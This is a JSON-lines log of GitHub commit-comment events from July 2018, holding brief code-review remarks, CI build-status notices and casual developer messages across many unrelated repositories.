{"id":"7999278578","type":"CommitCommentEvent","actor":{"login":"ReyDonovan"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790254,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:20:19Z","updated_at":"2018-07-21T22:20:19Z","author_association":"NONE","body":"у тебя вообще доступ ко все проэктам на gitlab"}},"created_at":"2018-07-21T22:20:19Z"}
{"id":"7999278746","type":"CommitCommentEvent","actor":{"login":"zumbipy"},"repo":{"name":"zumbipy/PythonExercicios"},"payload":{"comment":{"id":29790255,"position":null,"line":null,"path":null,"commit_id":"e5b7914017ed3b1b465f6b6aff154d9f2de9fafc","created_at":"2018-07-21T22:20:29Z","updated_at":"2018-07-21T22:20:29Z","author_association":"OWNER","body":"modificações."}},"created_at":"2018-07-21T22:20:29Z"}
{"id":"7999278818","type":"CommitCommentEvent","actor":{"login":"Ch4rg3r"},"repo":{"name":"jeremyVignelles/libvlcsharp"},"payload":{"comment":{"id":29790257,"position":null,"line":null,"path":null,"commit_id":"fe3252a6e4db2fdaad2a3e90aca24430ef3417cc","created_at":"2018-07-21T22:20:33Z","updated_at":"2018-07-21T22:20:33Z","author_association":"NONE","body":"Just an information. Tried the Forms.Gtk.Sample, didn't work for me. Except i change `MainPage` constructor like this:\r\n```\r\npublic MainPage()\r\n{\r\n    InitializeComponent();\r\n    videoView.LibVLC = new LibVLC();\r\n    videoView.MediaPlayer = new MediaPlayer(videoView.LibVLC);\r\n}\r\n```\r\nBut it's rendered in an external Window (running on Win10). On Linux i cannot run it at all."}},"created_at":"2018-07-21T22:20:33Z"}
{"id":"7999279681","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790263,"position":8,"line":38,"path":"include/fusion.hpp","commit_id":"e1c1c3467984b86e3b5d085207ac95d095433be5","created_at":"2018-07-21T22:21:27Z","updated_at":"2018-07-21T22:21:27Z","author_association":"NONE","body":"you can use `openMV::D2R()`"}},"created_at":"2018-07-21T22:21:27Z"}
{"id":"7999280853","type":"CommitCommentEvent","actor":{"login":"zumbipy"},"repo":{"name":"zumbipy/PythonExercicios"},"payload":{"comment":{"id":29790266,"position":null,"line":null,"path":null,"commit_id":"03c53ca3078fada28ecba83c628eccaf156fb714","created_at":"2018-07-21T22:22:39Z","updated_at":"2018-07-21T22:22:39Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-21T22:22:39Z"}
{"id":"7999281569","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790267,"position":183,"line":183,"path":"include/pwmvs.hpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:23:25Z","updated_at":"2018-07-21T22:23:25Z","author_association":"NONE","body":"You can replace this loop by using `std::max_element(evaluations, evaluations + N)`"}},"created_at":"2018-07-21T22:23:25Z"}
{"id":"7999288383","type":"CommitCommentEvent","actor":{"login":"pavankataria"},"repo":{"name":"azolyoung/SwiftDataTables"},"payload":{"comment":{"id":29790286,"position":null,"line":null,"path":null,"commit_id":"1cab181bb8ca944070a37676b8796257d800ba9d","created_at":"2018-07-21T22:30:25Z","updated_at":"2018-07-21T22:30:25Z","author_association":"NONE","body":"Hi mate, if you downloaded the latest release of this library, you can now use the delegate and datasource methods to change the default row height and heights of individual rows; toggle the hiding of search bars; and make further customisations. Check it out! "}},"created_at":"2018-07-21T22:30:25Z"}
{"id":"7999289397","type":"CommitCommentEvent","actor":{"login":"BigRoy"},"repo":{"name":"BigRoy/core"},"payload":{"comment":{"id":29790291,"position":74,"line":188,"path":"avalon/tools/cbloader/app.py","commit_id":"2d7b6c2e3663e81072f7794b0f6830b04a280cc5","created_at":"2018-07-21T22:31:13Z","updated_at":"2018-07-21T22:31:13Z","author_association":"OWNER","body":"Hmm, seems like I should put this back in - not sure why it was there but I recall otherwise seeing false positives of what was actually active."}},"created_at":"2018-07-21T22:31:13Z"}
{"id":"7999289998","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790294,"position":378,"line":378,"path":"include/photometric_consistency.hpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:31:51Z","updated_at":"2018-07-21T22:31:51Z","author_association":"NONE","body":"We could make the class having a template parameter (the pixel sampler).\r\nThis way `SampleCubic` and `SampleLinear` would be a single function `SampleSubPixel()`"}},"created_at":"2018-07-21T22:31:51Z"}
{"id":"7999290173","type":"CommitCommentEvent","actor":{"login":"minggli"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29790297,"position":6,"line":1700,"path":"pandas/core/frame.py","commit_id":"6008d75ac00aa7c3052b74bf4f6eb73beeaf56a6","created_at":"2018-07-21T22:32:02Z","updated_at":"2018-07-21T22:32:02Z","author_association":"CONTRIBUTOR","body":"@Dobatymo zip for writing is added for csv, json, and pickle in 0.23. so it's fine to keep `zip` in the docstring."}},"created_at":"2018-07-21T22:32:02Z"}
{"id":"7999290659","type":"CommitCommentEvent","actor":{"login":"jl-welch"},"repo":{"name":"jl-welch/gumball"},"payload":{"comment":{"id":29790300,"position":null,"line":null,"path":null,"commit_id":"8749bd35b2b3e50638d91c499eefe91a8a185554","created_at":"2018-07-21T22:32:28Z","updated_at":"2018-07-21T22:32:28Z","author_association":"OWNER","body":"Code was copied over from my [codepen](https://codepen.io/xenalak/pen/BPppLN) testing this at first."}},"created_at":"2018-07-21T22:32:28Z"}
{"id":"7999293149","type":"CommitCommentEvent","actor":{"login":"plainspace"},"repo":{"name":"plainspace/join-dev-design"},"payload":{"comment":{"id":29790305,"position":98,"line":71,"path":"docs/index.html","commit_id":"b22729f1a76ea1bc4f3074c7a13a306f0445f246","created_at":"2018-07-21T22:34:46Z","updated_at":"2018-07-21T22:34:46Z","author_association":"OWNER","body":"Does everyone working on this use Code? Can we remove this line?"}},"created_at":"2018-07-21T22:34:46Z"}
{"id":"7999293497","type":"CommitCommentEvent","actor":{"login":"plainspace"},"repo":{"name":"plainspace/join-dev-design"},"payload":{"comment":{"id":29790307,"position":101,"line":74,"path":"docs/index.html","commit_id":"b22729f1a76ea1bc4f3074c7a13a306f0445f246","created_at":"2018-07-21T22:35:09Z","updated_at":"2018-07-21T22:35:09Z","author_association":"OWNER","body":"This section doesn't work well on narrow viewports. Need to split up the line."}},"created_at":"2018-07-21T22:35:09Z"}
{"id":"7999293511","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790308,"position":154,"line":154,"path":"include/workspace_io_eth3d.hpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:35:10Z","updated_at":"2018-07-21T22:35:10Z","author_association":"NONE","body":"OpenMVG develop has now a ETH3D importer"}},"created_at":"2018-07-21T22:35:10Z"}
{"id":"7999293771","type":"CommitCommentEvent","actor":{"login":"JuliaSoboleva"},"repo":{"name":"wbaumann/SmartReceiptsLibrary"},"payload":{"comment":{"id":29790309,"position":null,"line":null,"path":null,"commit_id":"9e063f57a4309d6acf46576afa2ec7b8412f062c","created_at":"2018-07-21T22:35:25Z","updated_at":"2018-07-21T22:35:25Z","author_association":"CONTRIBUTOR","body":"Sounds great! Would be cool to see CI in action :)"}},"created_at":"2018-07-21T22:35:25Z"}
{"id":"7999294921","type":"CommitCommentEvent","actor":{"login":"jean-m-cyr"},"repo":{"name":"ethereum-mining/ethminer"},"payload":{"comment":{"id":29790311,"position":null,"line":null,"path":null,"commit_id":"8ad03b0a301062b0e3d163b3b387c48c89df0f52","created_at":"2018-07-21T22:36:33Z","updated_at":"2018-07-21T22:36:33Z","author_association":"COLLABORATOR","body":"Fixed now"}},"created_at":"2018-07-21T22:36:33Z"}
{"id":"7999295179","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790317,"position":91,"line":91,"path":"src/fusion.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:36:51Z","updated_at":"2018-07-21T22:36:51Z","author_association":"NONE","body":"you can avoid the make_pair and use `used.insert({ref_item.image_id, {ref_item.x(0), ref_item.x(1)}})`"}},"created_at":"2018-07-21T22:36:51Z"}
{"id":"7999295940","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790318,"position":96,"line":96,"path":"src/fusion.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:37:35Z","updated_at":"2018-07-21T22:37:35Z","author_association":"NONE","body":"Why do you want the channel separated in different array?"}},"created_at":"2018-07-21T22:37:35Z"}
{"id":"7999296483","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790323,"position":182,"line":182,"path":"src/fusion.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:38:05Z","updated_at":"2018-07-21T22:38:05Z","author_association":"NONE","body":"typo: `pupulateQueue` -> `populateQueue`"}},"created_at":"2018-07-21T22:38:05Z"}
{"id":"7999296924","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790324,"position":185,"line":185,"path":"src/fusion.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:38:33Z","updated_at":"2018-07-21T22:38:33Z","author_association":"NONE","body":"20 seems a parameter that should be described or available in the h file"}},"created_at":"2018-07-21T22:38:33Z"}
{"id":"7999301521","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790331,"position":251,"line":251,"path":"src/pwmvs.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:43:12Z","updated_at":"2018-07-21T22:43:12Z","author_association":"NONE","body":"If you emplace back you should not create the object and use the inplace creation.\r\n`color_similarities.emplace_back(ref->width, ref->height, true, 0);` should work;\r\nSame for the 3 next lines"}},"created_at":"2018-07-21T22:43:12Z"}
{"id":"7999302481","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790332,"position":269,"line":269,"path":"src/pwmvs.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:44:13Z","updated_at":"2018-07-21T22:44:13Z","author_association":"NONE","body":"Depending of the image alignment it could be more efficient to parallel row rather col"}},"created_at":"2018-07-21T22:44:13Z"}
{"id":"7999303160","type":"CommitCommentEvent","actor":{"login":"RobbWatershed"},"repo":{"name":"avluis/Hentoid"},"payload":{"comment":{"id":29790333,"position":22,"line":214,"path":"app/src/main/java/me/devsaki/hentoid/util/FileHelper.java","commit_id":"6ef5ed7f8c61db4947aa53ddc5f00ef10cce82f7","created_at":"2018-07-21T22:45:00Z","updated_at":"2018-07-21T22:45:00Z","author_association":"CONTRIBUTOR","body":"1/ Shouldn't it be  **else** if (!file.delete() && file.exists()) isSuccess = false; "}},"created_at":"2018-07-21T22:45:00Z"}
{"id":"7999303498","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790337,"position":311,"line":311,"path":"src/pwmvs.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:45:19Z","updated_at":"2018-07-21T22:45:19Z","author_association":"NONE","body":"seems that now it shoud be fine"}},"created_at":"2018-07-21T22:45:19Z"}
{"id":"7999304437","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"mitjap/pwmvs"},"payload":{"comment":{"id":29790338,"position":81,"line":81,"path":"src/pwmvs_controller.cpp","commit_id":"53b7a2c3e79a6dd74bfb8e43948bc8d810adead7","created_at":"2018-07-21T22:46:19Z","updated_at":"2018-07-21T22:46:19Z","author_association":"NONE","body":"emplace_back"}},"created_at":"2018-07-21T22:46:19Z"}
{"id":"7999305909","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790339,"position":38,"line":111,"path":"sc2/client.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:47:35Z","updated_at":"2018-07-21T22:47:35Z","author_association":"COLLABORATOR","body":"Game step will now be variable (untested what happens when two bots have different game_step set)"}},"created_at":"2018-07-21T22:47:35Z"}
{"id":"7999306307","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790340,"position":82,"line":195,"path":"sc2/client.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:48:05Z","updated_at":"2018-07-21T22:48:05Z","author_association":"COLLABORATOR","body":"Combine requests of path finding distance"}},"created_at":"2018-07-21T22:48:05Z"}
{"id":"7999306787","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790341,"position":143,"line":326,"path":"sc2/client.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:48:34Z","updated_at":"2018-07-21T22:48:34Z","author_association":"COLLABORATOR","body":"Makes it possible to create multiple different units in one request"}},"created_at":"2018-07-21T22:48:34Z"}
{"id":"7999307455","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790346,"position":6,"line":152,"path":"sc2/game_info.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:49:17Z","updated_at":"2018-07-21T22:49:17Z","author_association":"COLLABORATOR","body":"Storing proto data for later access in case this API missed some info"}},"created_at":"2018-07-21T22:49:17Z"}
{"id":"7999307547","type":"CommitCommentEvent","actor":{"login":"amosonn"},"repo":{"name":"circleofcircles/circleofcircles"},"payload":{"comment":{"id":29790347,"position":null,"line":null,"path":null,"commit_id":"aab4ffd664b77bd6afb85e8d5660da66a4bf1776","created_at":"2018-07-21T22:49:22Z","updated_at":"2018-07-21T22:49:22Z","author_association":"CONTRIBUTOR","body":"Yeah, I think I mentioned that. Check out my new version.\n\nOn Sat, Jul 21, 2018, 22:21 simsim314 <notifications@github.com> wrote:\n\n> I think words are basically \"public entities\" but my point was not about\n> the words, but the fact that every time we learn this public entity - we\n> interpret it uniquely by our own references (internal language), which then\n> is used to learn how our perspective is similar or different from others.\n> More than that we can use words to modify our perspective at some way.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/circleofcircles/circleofcircles/commit/aab4ffd664b77bd6afb85e8d5660da66a4bf1776#commitcomment-29789839>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC_zrSJ8HP6pczcq_lR4MKnss9ty-5SAks5uI41DgaJpZM4VIjrh>\n> .\n>\n"}},"created_at":"2018-07-21T22:49:22Z"}
{"id":"7999307605","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790348,"position":46,"line":47,"path":"sc2/game_state.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:49:26Z","updated_at":"2018-07-21T22:49:26Z","author_association":"COLLABORATOR","body":"Add sensor tower blip type"}},"created_at":"2018-07-21T22:49:26Z"}
{"id":"7999307944","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"xhoogland/matrix"},"payload":{"comment":{"id":29790349,"position":null,"line":null,"path":null,"commit_id":"d4f610561282caa5b0b13a1ea5d2a42e76838106","created_at":"2018-07-21T22:49:49Z","updated_at":"2018-07-21T22:49:49Z","author_association":"OWNER","body":"This fixes #3. :)"}},"created_at":"2018-07-21T22:49:49Z"}
{"id":"7999308059","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790350,"position":70,"line":92,"path":"sc2/game_state.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:49:58Z","updated_at":"2018-07-21T22:49:58Z","author_association":"COLLABORATOR","body":"Add score which has information like \"resources enemy units killed\" and \"mineral income rate per minute\""}},"created_at":"2018-07-21T22:49:58Z"}
{"id":"7999308495","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790351,"position":82,"line":102,"path":"sc2/game_state.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:50:24Z","updated_at":"2018-07-21T22:50:24Z","author_association":"COLLABORATOR","body":"Blips detected by sensor tower now available, previously unavailable or would crash the game"}},"created_at":"2018-07-21T22:50:24Z"}
{"id":"7999308623","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790352,"position":5,"line":16,"path":"sc2/helpers/control_group.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:50:31Z","updated_at":"2018-07-21T22:50:31Z","author_association":"COLLABORATOR","body":"Bug fix"}},"created_at":"2018-07-21T22:50:31Z"}
{"id":"7999309126","type":"CommitCommentEvent","actor":{"login":"BurnySc2"},"repo":{"name":"Dentosal/python-sc2"},"payload":{"comment":{"id":29790353,"position":29,"line":44,"path":"sc2/client.py","commit_id":"38db7c29b1a2169abbf86f440f00f600d0fb9e3b","created_at":"2018-07-21T22:51:07Z","updated_at":"2018-07-21T22:51:07Z","author_association":"COLLABORATOR","body":"Makes the Score data available"}},"created_at":"2018-07-21T22:51:07Z"}
{"id":"7999309353","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"xhoogland/matrix"},"payload":{"comment":{"id":29790354,"position":null,"line":null,"path":null,"commit_id":"d4f610561282caa5b0b13a1ea5d2a42e76838106","created_at":"2018-07-21T22:51:21Z","updated_at":"2018-07-21T22:51:21Z","author_association":"OWNER","body":"This fixes issue #3. :)"}},"created_at":"2018-07-21T22:51:21Z"}
{"id":"7999315800","type":"CommitCommentEvent","actor":{"login":"eed3si9n"},"repo":{"name":"lightbend/paradox"},"payload":{"comment":{"id":29790359,"position":14,"line":56,"path":"plugin/src/main/scala/com/lightbend/paradox/sbt/ParadoxPlugin.scala","commit_id":"1222fe9cd71f8b7a6d3e62f8a64718b8c0abde26","created_at":"2018-07-21T22:58:25Z","updated_at":"2018-07-21T22:58:25Z","author_association":"MEMBER","body":"See https://github.com/magro/paradox/pull/1"}},"created_at":"2018-07-21T22:58:25Z"}
{"id":"7999317799","type":"CommitCommentEvent","actor":{"login":"dewmercer"},"repo":{"name":"mysensors/MySensors"},"payload":{"comment":{"id":29790366,"position":29,"line":142,"path":"hal/transport/RF24/MyTransportRF24.cpp","commit_id":"57eca4f4afb3a26f4ef0ec10d522ac062de4d101","created_at":"2018-07-21T23:00:18Z","updated_at":"2018-07-21T23:00:18Z","author_association":"NONE","body":"@tekka007 \r\n\r\nPlease see my comment on reuse of IVs [here](https://github.com/mysensors/MySensors/commit/bbaa9399d6e68f1342173c886baae4d8bd51afb3#diff-04b58ec32b22851ae7f8b0df86a53651) "}},"created_at":"2018-07-21T23:00:18Z"}
{"id":"7999320068","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790368,"position":null,"line":null,"path":null,"commit_id":"27c02bc659f002ef986f3e16a4755166c3fc3c20","created_at":"2018-07-21T23:02:21Z","updated_at":"2018-07-21T23:02:21Z","author_association":"NONE","body":"develop (Nigusse) - x86_64-MacOS-10.9-clang: OK (2320 of 2320 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-21T23:02:21Z"}
{"id":"7999320818","type":"CommitCommentEvent","actor":{"login":"dewmercer"},"repo":{"name":"mysensors/MySensors"},"payload":{"comment":{"id":29790372,"position":71,"line":69,"path":"hal/transport/NRF5_ESB/MyTransportNRF5_ESB.cpp","commit_id":"6794c72ecd8c35c1a7587f73996d50c347b17f93","created_at":"2018-07-21T23:03:13Z","updated_at":"2018-07-21T23:03:13Z","author_association":"NONE","body":"@tekka007\r\n\r\nThis is a pretty nasty security issue.\r\n\r\nPlease see my comment on reuse of IVs [here](https://github.com/mysensors/MySensors/commit/bbaa9399d6e68f1342173c886baae4d8bd51afb3#diff-98f431742368069f01f153ed58666787)"}},"created_at":"2018-07-21T23:03:13Z"}
{"id":"7999324414","type":"CommitCommentEvent","actor":{"login":"magro"},"repo":{"name":"lightbend/paradox"},"payload":{"comment":{"id":29790379,"position":14,"line":56,"path":"plugin/src/main/scala/com/lightbend/paradox/sbt/ParadoxPlugin.scala","commit_id":"1222fe9cd71f8b7a6d3e62f8a64718b8c0abde26","created_at":"2018-07-21T23:06:42Z","updated_at":"2018-07-21T23:06:42Z","author_association":"NONE","body":"Awesome, thanks for that!"}},"created_at":"2018-07-21T23:06:42Z"}
{"id":"7999328685","type":"CommitCommentEvent","actor":{"login":"vin001gmailcom"},"repo":{"name":"vin001gmailcom/Microservicios"},"payload":{"comment":{"id":29790391,"position":null,"line":null,"path":null,"commit_id":"5b03c8fb0f6a28edb715f78f4e8e8abcd0c20010","created_at":"2018-07-21T23:11:11Z","updated_at":"2018-07-21T23:11:11Z","author_association":"OWNER","body":"[Enlace a ayuda para instalar y usar el API de cripto monedas](https://drive.google.com/open?id=1oL9tcyAXzuIwf59Bia-DGxc9LRYtYZZp)"}},"created_at":"2018-07-21T23:11:11Z"}
{"id":"7999337705","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29790405,"position":null,"line":null,"path":null,"commit_id":"1a0d7959dbaff24151b37acdeedd9538b1698fe3","created_at":"2018-07-21T23:21:14Z","updated_at":"2018-07-21T23:21:14Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-250](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-250).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-250-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-21T23:21:14Z"}
{"id":"7999338167","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790407,"position":null,"line":null,"path":null,"commit_id":"27c02bc659f002ef986f3e16a4755166c3fc3c20","created_at":"2018-07-21T23:21:47Z","updated_at":"2018-07-21T23:21:47Z","author_association":"NONE","body":"develop (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2340 of 2340 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-21T23:21:47Z"}
{"id":"7999338299","type":"CommitCommentEvent","actor":{"login":"lorettarehm"},"repo":{"name":"lorettarehm/UdacityBertelsmannDataScienceTeam39"},"payload":{"comment":{"id":29790408,"position":null,"line":null,"path":null,"commit_id":"772dbf5078b07bafe884f39638079056441dbd25","created_at":"2018-07-21T23:21:59Z","updated_at":"2018-07-21T23:21:59Z","author_association":"OWNER","body":"UNMERGE"}},"created_at":"2018-07-21T23:21:59Z"}
{"id":"7999339064","type":"CommitCommentEvent","actor":{"login":"zp729428"},"repo":{"name":"zp729428/test"},"payload":{"comment":{"id":29790410,"position":null,"line":null,"path":null,"commit_id":"ea8679a1bf1ead8b5f5a7192efef6b1eb627090c","created_at":"2018-07-21T23:22:48Z","updated_at":"2018-07-21T23:22:48Z","author_association":"OWNER","body":"项目追加描述"}},"created_at":"2018-07-21T23:22:48Z"}
{"id":"7999348987","type":"CommitCommentEvent","actor":{"login":"Awsome-Areej"},"repo":{"name":"Awsome-Areej/Mini-AI"},"payload":{"comment":{"id":29790439,"position":null,"line":null,"path":null,"commit_id":"38a61b9dd9aa5b0401220458362058da3a99266a","created_at":"2018-07-21T23:33:51Z","updated_at":"2018-07-21T23:33:51Z","author_association":"OWNER","body":"This would be a mini piece of my AI.That's why I call it Mini AI!"}},"created_at":"2018-07-21T23:33:51Z"}
{"id":"7999349231","type":"CommitCommentEvent","actor":{"login":"piperun"},"repo":{"name":"piperun/iploggerfilter"},"payload":{"comment":{"id":29790440,"position":3,"line":6,"path":"README.md","commit_id":"e4943f9196d825a7c6904159efad5bf732095fc6","created_at":"2018-07-21T23:34:07Z","updated_at":"2018-07-21T23:34:07Z","author_association":"OWNER","body":"Thanks for the spell checking! 👍 \r\nHmm interesting, I remember reading that is one of the primary features ublock Origin advertises, I'm unsure exactly how you would fix this, since I'm not an active user of ABP, but I know that ABP and ublock Origin share a similar syntax."}},"created_at":"2018-07-21T23:34:07Z"}
{"id":"7999350211","type":"CommitCommentEvent","actor":{"login":"auriamg"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29790441,"position":null,"line":null,"path":null,"commit_id":"16e53cbf4d8bccc8e4e7a83fc198f73e48340756","created_at":"2018-07-21T23:35:16Z","updated_at":"2018-07-21T23:35:16Z","author_association":"MEMBER","body":"@deveee I know, the message has been well received, several contributors don't like these new icons. That being said, atm, we have some icon coming from desktop application icon sets (or look like they do), not ideal for a game where having a consistent/fun look would be nice. I'd also like your feedback on what could be changed so that you like them better"}},"created_at":"2018-07-21T23:35:16Z"}
{"id":"7999352285","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29790443,"position":37,"line":54,"path":"tests/TicTacToeTest.php","commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-21T23:37:38Z","updated_at":"2018-07-21T23:37:38Z","author_association":"NONE","body":"Yes, TDD is top to bottom, but that doesn't mean you don't need to make moves in the tests.\r\n\r\nYou would be able to make one test pass by implementing whatever logic is necessary for that particular test to pass in the innards of Game. \r\n\r\nHowever, you'd have problems afterwards making other tests pass, which test for a different scenario. \r\n\r\nWhich means you have to specify the moves in the tests.\r\n\r\nBecause of this, TDD leads to the design of decoupled systems. Testable system = decoupled system.\r\n\r\nThere is one more aspect why you want the moves to be directly visible in the test: documentation.\r\n\r\nEach test is documenting a small slice of the system under testing: it has a name (a story), a series of steps to set up (the moves and wiring together the objects) and asserting that the relevant parts are or are not in a specific state.\r\n\r\nThis kind of documentation is the best kind of documentation, because it's an executable program, so whatever you write in it documents the actual code in the most concise way (at a specific level of abstraction).\r\n\r\nIt's not some loose documents or UML diagrams which happen to lay around. "}},"created_at":"2018-07-21T23:37:38Z"}
{"id":"7999356496","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29790450,"position":null,"line":null,"path":null,"commit_id":"86d05e0de20434f15ceda817e6fd2e229bb750f8","created_at":"2018-07-21T23:42:35Z","updated_at":"2018-07-21T23:42:35Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-903](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-903).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-903-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-21T23:42:35Z"}
{"id":"7999358770","type":"CommitCommentEvent","actor":{"login":"KenCherline"},"repo":{"name":"KenCherline/nyt"},"payload":{"comment":{"id":29790452,"position":null,"line":null,"path":null,"commit_id":"fa7bb239cec4df8ad3ca2c3d79cf65790fd7bb47","created_at":"2018-07-21T23:45:13Z","updated_at":"2018-07-21T23:45:13Z","author_association":"OWNER","body":"nyt "}},"created_at":"2018-07-21T23:45:13Z"}
{"id":"7999359109","type":"CommitCommentEvent","actor":{"login":"samirelanduk"},"repo":{"name":"alexharston/petrank"},"payload":{"comment":{"id":29790456,"position":null,"line":null,"path":null,"commit_id":"51fadbf406ef27558bc61fbfcc9cf786c700b22e","created_at":"2018-07-21T23:45:33Z","updated_at":"2018-07-21T23:45:33Z","author_association":"COLLABORATOR","body":"🚨🚨🚨🚨🚨🚨🚨"}},"created_at":"2018-07-21T23:45:33Z"}
